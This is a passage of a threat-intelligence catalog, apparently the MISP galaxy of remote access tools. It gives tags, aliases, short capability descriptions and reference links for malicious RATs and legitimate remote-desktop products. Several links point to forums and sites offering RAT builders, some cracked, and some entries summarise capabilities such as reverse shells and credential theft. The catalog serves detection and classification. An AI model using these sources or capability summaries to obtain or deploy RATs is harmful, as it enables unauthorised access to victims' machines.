<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html">http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html</a></td>
</tr>
</tbody>
</table>

**Luminosity Link**

The tag is: `misp-galaxy:rat="Luminosity Link"`

*Table 5701. Table References*

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://luminosity.link/">https://luminosity.link/</a></td>
</tr>
</tbody>
</table>

**Orcus**

The tag is: `misp-galaxy:rat="Orcus"`

*Table 5702. Table References*

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://orcustechnologies.com/">https://orcustechnologies.com/</a></td>
</tr>
</tbody>
</table>

**Blizzard**

The tag is: `misp-galaxy:rat="Blizzard"`

*Table 5703. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html">http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html</a></td>
</tr>
</tbody>
</table>
Kazybot
The tag is: misp-galaxy:rat="Kazybot"

Table 5704. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://www.rekings.com/kazybot-lite-php-rat/">https://www.rekings.com/kazybot-lite-php-rat/</a></td>
</tr>
<tr>
<td><a href="http://telussecuritylabs.com/threats/show/TSL20150122-06">http://telussecuritylabs.com/threats/show/TSL20150122-06</a></td>
</tr>
</tbody>
</table>

BX
The tag is: misp-galaxy:rat="BX"

Table 5705. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html">http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html</a></td>
</tr>
</tbody>
</table>

death
The tag is: misp-galaxy:rat="death"

Sky Wyder
The tag is: misp-galaxy:rat="Sky Wyder"

Table 5706. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://rubear.me/threads/sky-wyder-2016-cracked.127/">https://rubear.me/threads/sky-wyder-2016-cracked.127/</a></td>
</tr>
</tbody>
</table>

DarkTrack
The tag is: misp-galaxy:rat="DarkTrack"

Table 5707. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://www.rekings.com/darktrack-4-alien/">https://www.rekings.com/darktrack-4-alien/</a></td>
</tr>
</tbody>
</table>

xRAT
Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote
Administration Tool coded in C# (using .NET Framework 2.0).

The tag is: misp-galaxy:rat="xRAT"

Table 5708. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/c4bbage/xRAT">https://github.com/c4bbage/xRAT</a></td>
</tr>
</tbody>
</table>

Biodox

The tag is: misp-galaxy:rat="Biodox"

Table 5709. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html">http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html</a></td>
</tr>
</tbody>
</table>

Offence

Offense RAT is a free remote administration tool made in Delphi 9.

The tag is: misp-galaxy:rat="Offence"

Table 5710. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://leakforums.net/thread-31386?tid=31386&amp;&amp;pq=1">https://leakforums.net/thread-31386?tid=31386&amp;&amp;pq=1</a></td>
</tr>
</tbody>
</table>

Apocalypse

The tag is: misp-galaxy:rat="Apocalypse"

Apocalypse has relationships with:

- similar: misp-galaxy:ransomware="Apocalypse" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

Table 5711. Table References

<table>
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<tbody>
<tr>
<td><a href="https://leakforums.net/thread-36962">https://leakforums.net/thread-36962</a></td>
</tr>
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</table>

Jcage

The tag is: misp-galaxy:rat="Jcage"
Nuclear RAT

Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).

The tag is: `misp-galaxy:rat="Nuclear RAT"`

Ozone

C++ REMOTE CONTROL PROGRAM

The tag is: `misp-galaxy:rat="Ozone"`

Xanity

The tag is: `misp-galaxy:rat="Xanity"`

DarkMoon

The tag is: `misp-galaxy:rat="DarkMoon"`

DarkMoon is also known as:

- Dark Moon
Xpert

The tag is: misp-galaxy:rat="Xpert"

Table 5716. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://broad-product.biz/forum/r-a-t-(remote-administration-tools)/xpert-rat-3-0-10-by-abronsius(vb6)/">http://broad-product.biz/forum/r-a-t-(remote-administration-tools)/xpert-rat-3-0-10-by-abronsius(vb6)/</a></td>
</tr>
<tr>
<td><a href="https://www.nulled.to/topic/18355-xpert-rat-309/">https://www.nulled.to/topic/18355-xpert-rat-309/</a></td>
</tr>
<tr>
<td><a href="https://trickytamilan.blogspot.lu/2016/03/xpert-rat.html">https://trickytamilan.blogspot.lu/2016/03/xpert-rat.html</a></td>
</tr>
</tbody>
</table>

Kiler RAT

This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell. From stealing credentials stored in browsers to accessing the victims webcam. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread utilizing physical devices, such as USB drives, but also to use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well known njrat, as they share many similar features such as their display style, several abilities and a general template for communication methods. However, where njrat left off KilerRat has taken over. KilerRat is a very feature rich RAT with an active development force that is rapidly gaining in popularity amongst the middle eastern community and the world.

The tag is: misp-galaxy:rat="Kiler RAT"

Kiler RAT is also known as:

- Njw0rm

Kiler RAT has relationships with:

- similar: misp-galaxy:rat="NJRat" with estimative-language:likelihood-probability="likely"

Table 5717. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off">https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off</a></td>
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</tbody>
</table>

Brat

The tag is: misp-galaxy:rat="Brat"
MINI-MO

The tag is: misp-galaxy:rat="MINI-MO"

Lost Door

Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It's promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT is found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.

The tag is: misp-galaxy:rat="Lost Door"

Lost Door is also known as:

• LostDoor

Table 5718. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://lost-door.blogspot.lu/">http://lost-door.blogspot.lu/</a></td>
</tr>
</tbody>
</table>

Loki RAT

Loki RAT is a php RAT that means no port forwarding is needed for this RAT, If you dont know how to setup this RAT click on tutorial.

The tag is: misp-galaxy:rat="Loki RAT"

Table 5719. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://www.rekings.com/loki-rat-php-rat/">https://www.rekings.com/loki-rat-php-rat/</a></td>
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</tbody>
</table>

MLRat

The tag is: misp-galaxy:rat="MLRat"

Table 5720. Table References

<table>
<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://github.com/BahNahNah/MLRat">https://github.com/BahNahNah/MLRat</a></td>
</tr>
</tbody>
</table>
SpyCronic

The tag is: misp-galaxy:rat="SpyCronic"

Table 5721. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://perfect-conexao.blogspot.lu/2014/09/spycronic-1021.html">http://perfect-conexao.blogspot.lu/2014/09/spycronic-1021.html</a></td>
</tr>
<tr>
<td><a href="http://www.connect-trojan.net/2013/09/spycronic-v1.02.1.html">http://www.connect-trojan.net/2013/09/spycronic-v1.02.1.html</a></td>
</tr>
<tr>
<td><a href="https://ranger-exploit.com/spycronic-v1-02-1/">https://ranger-exploit.com/spycronic-v1-02-1/</a></td>
</tr>
</tbody>
</table>

Pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python.

The tag is: misp-galaxy:rat="Pupy"

Pupy has relationships with:

- similar: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="likely"

Table 5722. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></td>
</tr>
</tbody>
</table>

Nova

Nova is a proof of concept demonstrating screen sharing over UDP hole punching.

The tag is: misp-galaxy:rat="Nova"

Table 5723. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://novarat.sourceforge.net/">http://novarat.sourceforge.net/</a></td>
</tr>
</tbody>
</table>

BD Y3K RAT

The tag is: misp-galaxy:rat="BD Y3K RAT"

BD Y3K RAT is also known as:

- Back Door Y3K RAT
- Y3k
Turkojan

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

The tag is: misp-galaxy:rat="Turkojan"

TINY

TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.

The tag is: misp-galaxy:rat="TINY"

SharK

sharK is an advanced reverse connecting, firewall bypassing remote administration tool written in VB6. With sharK you will be able to administrate every PC (using Windows OS) remotely.

The tag is: misp-galaxy:rat="SharK"

SharK is also known as:

- SHARK
- Shark

SharK has relationships with:
Snowdoor

Backdoor.Snowdoor is a Backdoor Trojan Horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5,328.

The tag is: misp-galaxy:rat="Snowdoor"

Snowdoor is also known as:

- Backdoor.Blizzard
- Backdoor.Fxdoor
- Backdoor.Snowdoor
- Backdoor:Win32/Snowdoor

Paradox

The tag is: misp-galaxy:rat="Paradox"

SpyNote

Android RAT

The tag is: misp-galaxy:rat="SpyNote"

SpyNote has relationships with:
ZOMBIE SLAYER

The tag is: `misp-galaxy:rat="ZOMBIE SLAYER"`

HTTP WEB BACKDOOR

The tag is: `misp-galaxy:rat="HTTP WEB BACKDOOR"`

NET-MONITOR PRO

Net Monitor for Employees lets you see what everyone’s doing - without leaving your desk. Monitor the activity of all employees. Plus you can share your screen with your employees PCs, making demos and presentations much easier.

The tag is: `misp-galaxy:rat="NET-MONITOR PRO"`

DameWare Mini Remote Control

Affordable remote control software for all your customer support and help desk needs.

The tag is: `misp-galaxy:rat="DameWare Mini Remote Control"`

DameWare Mini Remote Control is also known as:

• dameware

Remote Utilities

Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.
Ammyy Admin

Ammyy Admin is a completely portable remote access program that's extremely simple to setup. It works by connecting one computer to another via an ID supplied by the program.

Ammyy Admin is also known as:

- Ammyy

Ultra VNC

UltraVNC works a bit like Remote Utilities, where a server and viewer is installed on two PCs, and the viewer is used to control the server.

AeroAdmin

AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.
Windows Remote Desktop

Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.

The tag is: `misp-galaxy:rat="Windows Remote Desktop"`

RemotePC

RemotePC, for good or bad, is a more simple free remote desktop program. You’re only allowed one connection (unless you upgrade) but for many of you, that’ll be just fine.

The tag is: `misp-galaxy:rat="RemotePC"`

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<tr>
<th>Table 5737. Table References</th>
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<tbody>
<tr>
<td>Links</td>
</tr>
<tr>
<td><a href="https://www">https://www</a> remotepc com/</td>
</tr>
</tbody>
</table>

Seecreen

Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that's absolutely perfect for on-demand, instant support.

The tag is: `misp-galaxy:rat="Seecreen"`

Seecreen is also known as:

• Firnass

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<tr>
<th>Table 5738. Table References</th>
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<tbody>
<tr>
<td>Links</td>
</tr>
<tr>
<td><a href="http://seecreen">http://seecreen</a> com/</td>
</tr>
</tbody>
</table>

Chrome Remote Desktop

Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you setup a computer for remote access from any other Chrome browser.

The tag is: `misp-galaxy:rat="Chrome Remote Desktop"`

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<th>Table 5739. Table References</th>
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<tr>
<td>Links</td>
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<tr>
<td><a href="https://chrome">https://chrome</a> google com/</td>
</tr>
</tbody>
</table>
| webstore/detail/chrome-remote-
  desktop/gbchcmhmahfphkhkmpfmihenigjmpp?hl=en |
AnyDesk

AnyDesk is a remote desktop program that you can run portably or install like a regular program.

The tag is: misp-galaxy:rat="AnyDesk"

Table 5740. Table References

<table>
<thead>
<tr>
<th>Links</th>
<th></th>
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</thead>
<tbody>
<tr>
<td><a href="https://anydesk.com/remote-desktop">https://anydesk.com/remote-desktop</a></td>
<td></td>
</tr>
</tbody>
</table>

LiteManager

LiteManager is another remote access program, and it's strikingly similar to Remote Utilities, which I explain on the first page of this list. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.

The tag is: misp-galaxy:rat="LiteManager"

Table 5741. Table References

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<tr>
<th>Links</th>
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<tr>
<td><a href="http://www.litemanager.com/">http://www.litemanager.com/</a></td>
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</tbody>
</table>

Comodo Unite

Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.

The tag is: misp-galaxy:rat="Comodo Unite"

Table 5742. Table References

<table>
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<th>Links</th>
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</table>

ShowMyPC

ShowMyPC is a portable and free remote access program that's nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.

The tag is: misp-galaxy:rat="ShowMyPC"

Table 5743. Table References

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<tr>
<th>Links</th>
<th></th>
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</thead>
</table>
join.me

join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.

The tag is: misp-galaxy:rat="join.me"

Table 5744. Table References
Links
https://www.join.me/

DesktopNow

DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.

The tag is: misp-galaxy:rat="DesktopNow"

Table 5745. Table References
Links
http://www.nchsoftware.com/remotedesktop/index.html

BeamYourScreen

Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter's screen.

The tag is: misp-galaxy:rat="BeamYourScreen"

Table 5746. Table References
Links
http://www.beamyourscreen.com/

Casa RAT

The tag is: misp-galaxy:rat="Casa RAT"

Bandook RAT

Bandook is a FWB##++ reverse connection rat (Remote Administration Tool), with a small size server
when packed 30 KB, and a long list of amazing features

The tag is: misp-galaxy:rat="Bandook RAT"

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<th>Table 5747. Table References</th>
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<tbody>
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<td>Links</td>
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| ![http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35](http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35) | NEW_](http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35NEW_)

Cerberus RAT

The tag is: misp-galaxy:rat="Cerberus RAT"

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<th>Table 5748. Table References</th>
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<tbody>
<tr>
<td>Links</td>
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<tr>
<td><img src="http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html" alt="http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html" /></td>
</tr>
</tbody>
</table>

Syndrome RAT

The tag is: misp-galaxy:rat="Syndrome RAT"

Snoopy

Snoopy is a Remote Administration Tool. Software for controlling user computer remotely from other computer on local network or Internet.

The tag is: misp-galaxy:rat="Snoopy"

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<th>Table 5749. Table References</th>
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</table>

5p00f3r.N$ RAT

The tag is: misp-galaxy:rat="5p00f3r.N$ RAT"

P. Storrie RAT

The tag is: misp-galaxy:rat="P. Storrie RAT"

1. Storrie RAT is also known as:

   ◦ P.Storrie RAT
**xHacker Pro RAT**

The tag is: `misp-galaxy:rat="xHacker Pro RAT"`

**NetDevil**

Backdoor.NetDevil allows a hacker to remotely control an infected computer.

The tag is: `misp-galaxy:rat="NetDevil"`

NetDevil has relationships with:

- similar: `misp-galaxy:rat="Net Devil"` with `estimative-language:likelihood-probability="likely"`

**Table 5750. Table References**

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<th>Links</th>
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</table>

**NanoCore**

In September of 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end of day credit card transactions. This system also had the capability of connecting to the corporate network which contained company sales reports. DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update, was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.

The tag is: `misp-galaxy:rat="NanoCore"`

NanoCore has relationships with:

- similar: `misp-galaxy:tool="NanoCoreRAT"` with `estimative-language:likelihood-probability="likely"`

**Table 5751. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://www.digitrustgroup.com/nanocore-not-your-average-rat/">https://www.digitrustgroup.com/nanocore-not-your-average-rat/</a></td>
</tr>
</tbody>
</table>

**Cobian RAT**

The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT)
family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had lot of similarities to the njRAT/H-Worm family.

The tag is: `misp-galaxy:rat="Cobian RAT"`

Cobian RAT has relationships with:

- similar: `misp-galaxy:malpedia="Cobian RAT"` with `estimative-language:likelihood-probability="likely"

Table 5752. Table References

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**Netsupport Manager**

NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.

The tag is: `misp-galaxy:rat="Netsupport Manager"`

Table 5753. Table References

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</table>

**Vortex**

The tag is: `misp-galaxy:rat="Vortex"`

**Assassin**

The tag is: `misp-galaxy:rat="Assassin"`

**Net Devil**

The tag is: `misp-galaxy:rat="Net Devil"`

Net Devil is also known as:

- NetDevil

Net Devil has relationships with:
• similar: misp-galaxy:rat="NetDevil" with estimative-language:likelihood-probability="likely"

**A4Zeta**

The tag is: *misp-galaxy:rat="A4Zeta"*

**Greek Hackers RAT**

The tag is: *misp-galaxy:rat="Greek Hackers RAT"*

**MRA RAT**

The tag is: *misp-galaxy:rat="MRA RAT"*

**Sparta RAT**

The tag is: *misp-galaxy:rat="Sparta RAT"*

**LokiTech**

The tag is: *misp-galaxy:rat="LokiTech"*
MadRAT
The tag is: misp-galaxy:rat="MadRAT"

Tequila Bandita
The tag is: misp-galaxy:rat="Tequila Bandita"

Table 5759. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html">http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html</a></td>
</tr>
</tbody>
</table>

Toquito Bandito
The tag is: misp-galaxy:rat="Toquito Bandito"

Table 5760. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html">http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html</a></td>
</tr>
</tbody>
</table>

MofoTro
MofoTro is a new rat coded by Cool_mofo_2.

The tag is: misp-galaxy:rat="MofoTro"

Table 5761. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta.html">http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta.html</a></td>
</tr>
<tr>
<td><a href="http://www.megasecurity.org/trojans/m/mofotro/Mofotroresurrection.html">http://www.megasecurity.org/trojans/m/mofotro/Mofotroresurrection.html</a></td>
</tr>
<tr>
<td><a href="http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta1.5.html">http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta1.5.html</a></td>
</tr>
</tbody>
</table>

Hav-RAT
Written in Delphi

The tag is: misp-galaxy:rat="Hav-RAT"

Table 5762. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html">http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html</a></td>
</tr>
</tbody>
</table>
ComRAT

ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla.

The tag is: `misp-galaxy:rat="ComRAT"`

ComRAT has relationships with:

- similar: `misp-galaxy:mitre-malware="ComRAT - S0126"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Agent.BTZ"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="Agent.BTZ"` with estimative-language:likelihood-probability="likely"

---

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007.

The tag is: `misp-galaxy:rat="4H RAT"`

4H RAT has relationships with:

- similar: `misp-galaxy:mitre-malware="4H RAT - S0065"` with estimative-language:likelihood-probability="likely"

---

Darknet RAT

The tag is: `misp-galaxy:rat="Darknet RAT"`

Darknet RAT is also known as:

- Dark NET RAT

---
**CIA RAT**
The tag is: `misp-galaxy:rat="CIA RAT"`

**Minimo**
The tag is: `misp-galaxy:rat="Minimo"`

**miniRAT**
The tag is: `misp-galaxy:rat="miniRAT"`

**Pain RAT**
The tag is: `misp-galaxy:rat="Pain RAT"`

**PlugX**

PlugX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.

The tag is: `misp-galaxy:rat="PlugX"`

PlugX is also known as:

- Korplug
- SOGU
- Scontroller

PlugX has relationships with:

- similar: `misp-galaxy:mitre-malware="PlugX - S0013"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="PlugX"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="PlugX"` with estimative-language:likelihood-probability="likely"

**Table 5766. Table References**

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<th>Links</th>
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</table>
UNITEDRAKE

The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.

The tag is: misp-galaxy:rat="UNITEDRAKE"

Table 5767. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://thehackernews.com/2017/09/shadowbrokers-unitedrake-hacking.html">Link</a></td>
</tr>
</tbody>
</table>

MegaTrojan

Written in Visual Basic

The tag is: misp-galaxy:rat="MegaTrojan"

Table 5768. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.megasecurity.org/trojans/m/mega/Megatrojan1.0.html">Link</a></td>
</tr>
</tbody>
</table>

Venomous Ivy

The tag is: misp-galaxy:rat="Venomous Ivy"

Xploit

The tag is: misp-galaxy:rat="Xploit"

Arctic R.A.T.

The tag is: misp-galaxy:rat="Arctic R.A.T."

Arctic R.A.T. is also known as:

- Artic

Table 5769. Table References

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<tbody>
<tr>
<td><a href="http://anti-virus-soft.com/threats/artic">Link</a></td>
</tr>
</tbody>
</table>
**GOlden Phoenix**

The tag is: `misp-galaxy:rat="GOlden Phoenix"`

*Table 5770. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html">http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html</a></td>
</tr>
</tbody>
</table>

**GraphicBooting**

The tag is: `misp-galaxy:rat="GraphicBooting"`

*Table 5771. Table References*

<table>
<thead>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0">http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0</a></td>
</tr>
</tbody>
</table>

**Pocket RAT**

The tag is: `misp-galaxy:rat="Pocket RAT"`

**Erebus**

The tag is: `misp-galaxy:rat="Erebus"`

Erebus has relationships with:

- similar: `misp-galaxy:malpedia="Erebus (ELF)"` with `estimative-language:likelihood-probability="likely"`

**SharpEye**

The tag is: `misp-galaxy:rat="SharpEye"`

*Table 5772. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2014/10/sharpeye-rat-1.0-beta-1.html">http://www.connect-trojan.net/2014/10/sharpeye-rat-1.0-beta-1.html</a></td>
</tr>
<tr>
<td><a href="http://www.connect-trojan.net/2014/02/sharpeye-rat-1.0-beta-2.html">http://www.connect-trojan.net/2014/02/sharpeye-rat-1.0-beta-2.html</a></td>
</tr>
</tbody>
</table>

**VorteX**

The tag is: `misp-galaxy:rat="VorteX"`
Archelaus Beta

The tag is: misp-galaxy:rat="Archelaus Beta"

Table 5773. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html">http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html</a></td>
</tr>
</tbody>
</table>

BlackHole

C# RAT (Remote Administration Tool) - Educational purposes only

The tag is: misp-galaxy:rat="BlackHole"

BlackHole has relationships with:

- similar: misp-galaxy:exploit-kit="BlackHole" with estimative-language:likelihood-probability="likely"

Table 5774. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/hussein-aitlahcen/BlackHole">https://github.com/hussein-aitlahcen/BlackHole</a></td>
</tr>
</tbody>
</table>

Vanguard

The tag is: misp-galaxy:rat="Vanguard"

Table 5775. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html">http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html</a></td>
</tr>
</tbody>
</table>

Ahtapod

The tag is: misp-galaxy:rat="Ahtapod"

Table 5776. Table References

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<td><a href="http://www.ibtimes.co.uk/turkish-journalist-baris-pehlivan-jailed-terrorism-was-framed-by-hackers-says-report-1577481">http://www.ibtimes.co.uk/turkish-journalist-baris-pehlivan-jailed-terrorism-was-framed-by-hackers-says-report-1577481</a></td>
</tr>
</tbody>
</table>

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to
carry out cyber espionage.

The tag is: `misp-galaxy:rat="FINSPY"`

FINSPY has relationships with:

- similar: `misp-galaxy:tool="FINSPY"` with `estimative-language:likelihood-probability="likely"`

**Table 5777. Table References**

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**Seed RAT**

Seed is a firewall bypass plus trojan, injects into default browser and has a simple purpose: to be compact (4kb server size) and useful while uploading bigger and full trojans, or even making Seed download them somewhere. Has computer info, process manager, file manager, with download, create folder, delete, execute and upload. And a remote download function. Everything with a easy to use interface, reminds an instant messenger.

The tag is: `misp-galaxy:rat="Seed RAT"`

**Table 5778. Table References**

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<tbody>
<tr>
<td><a href="http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/">http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/</a></td>
</tr>
</tbody>
</table>

**SharpBot**

The tag is: `misp-galaxy:rat="SharpBot"`

**TorCT PHP RAT**

The tag is: `misp-galaxy:rat="TorCT PHP RAT"`

**Table 5779. Table References**

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<tbody>
<tr>
<td><a href="https://github.com/alienwithin/torCT-PHP-RAT">https://github.com/alienwithin/torCT-PHP-RAT</a></td>
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</table>

**A32s RAT**

The tag is: `misp-galaxy:rat="A32s RAT"`

**Char0n**

The tag is: `misp-galaxy:rat="Char0n"`
Nytro

The tag is: misp-galaxy:rat="Nytro"

Syla

The tag is: misp-galaxy:rat="Syla"

Table 5780. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.connect-trojan.net/2013/07/syla-rat-0.3.html">http://www.connect-trojan.net/2013/07/syla-rat-0.3.html</a></td>
</tr>
</tbody>
</table>

Cobalt Strike

Cobalt Strike is software for Adversary Simulations and Red Team Operations.

The tag is: misp-galaxy:rat="Cobalt Strike"

Cobalt Strike has relationships with:

- similar: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 5781. Table References

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<tr>
<td><a href="https://www.cobaltstrike.com/">https://www.cobaltstrike.com/</a></td>
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</table>

Sakula

The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.

The tag is: misp-galaxy:rat="Sakula"

Sakula is also known as:

- Sakurel
- VIPER

Sakula has relationships with:

- similar: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"
### hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18.

The tag is: `misp-galaxy:rat="hcdLoader"`

hcdLoader has relationships with:

- similar: `misp-galaxy:mitre-malware="hcdLoader - S0071"` with `estimative-language:likelihood-probability="likely"

### Crimson

